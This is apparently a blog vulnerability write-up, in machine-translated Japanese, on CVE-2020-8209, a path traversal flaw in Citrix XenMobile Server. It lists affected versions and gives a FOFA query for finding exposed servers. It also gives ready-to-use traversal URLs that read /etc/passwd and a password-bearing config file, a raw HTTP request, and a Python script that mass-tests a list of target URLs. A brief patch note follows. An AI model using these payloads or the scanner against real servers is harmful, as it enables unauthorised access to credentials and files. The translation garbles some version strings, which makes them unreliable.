0x00はじめに
XenMobileは、Citrixによって開発されたエンタープライズモビリティ管理ソフトウェアです。この製品を使用すると、企業は従業員のモバイルデバイスとモバイルアプリケーションを管理できます。このソフトウェアの目的は、従業員が企業所有および個人のモバイルデバイスとアプリケーションで安全に作業して生産性を向上できるようにすることです。 。CVE-2020-8209、パストラバーサルの脆弱性。この脆弱性により、権限のないユーザーが、パスワードを含む構成ファイルを含む任意のファイルを読み取ることができます。(ソフトウェアは主に海外にありますが、中国ではめったにありません)
RP2より前のCitrixXenMobile Server 10.12、RP4より前のCitrix XenMobile Server 10.11、RP6より前のCitrix XenMobile Server 10.10、およびRP5より前のCitrix XenMobile Server 10.9のアクセス制御が不適切であったため、任意のファイルを読み取ることができました。
0x01影響を受けるバージョン
- RP210.12より前のXenMobileサーバー
- RP410.11より前のXenMobileサーバー
- RP610.10より前のXenMobileサーバー
- 10.9RP5より前のXenMobileサーバー
0x02FOFA構文
app = "XenMobile-Console"
0x03脆弱性の再発
POC:
/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd
/jsp/help-sb-download.jsp?sbFileName=../../../opt/sas/sw/config/sftu.properties
パケットPOC:
GET /jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd HTTP/1.1
Host: xxx.xxx.xxx.xxx
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.81 Safari/537.36 SE 2.X MetaSr 1.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: https://fofa.so/result?qbase64=YXBwPSJYZW5Nb2JpbGUt5o6n5Yi25Y%2BwIiAmJiBjb3VudHJ5PSJERSI%3D
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
0x04バッチスクリプト
#!/usr/bin/env python
# coding:utf-8
import requests,sys,colorama
from colorama import *
init(autoreset=True)
def XenMobile():
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"}
payload= '/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd'
poc=urls+payload
try:
requests.packages.urllib3.disable_warnings()#解决InsecureRequestWarning警告
response=requests.get(poc,headers=headers,timeout=10,verify=False)
if response.status_code==200 and "root" in response.content:
print(u'\033[1;31;40m[+]{} 存在Citrix XenMobile 目录遍历漏洞'.format(urls))
else:
print('[-]{} None'.format(urls))
except:
print(u'{} 请求超时'.format(urls))
if __name__ == '__main__':
print (banner)
if len(sys.argv)!=2:
print('Example:python CVE-2020-8209-Multiple.py url.txt')
else:
file = open(sys.argv[1])
for url in file.readlines():
urls=url.strip()
XenMobile()
print ('Check Over')
0x05修理の提案
公式パッチは/opt/sas/sw/tomcat/inst1/webapps/ROOT/jsp/help-sb-download.jspを削除しました
次のことを示してください:Adminxeのブログ » CVE-2020-8209(Citrix Endpoint Management)XenMobile-Consoleには任意のファイル読み取りの脆弱性があります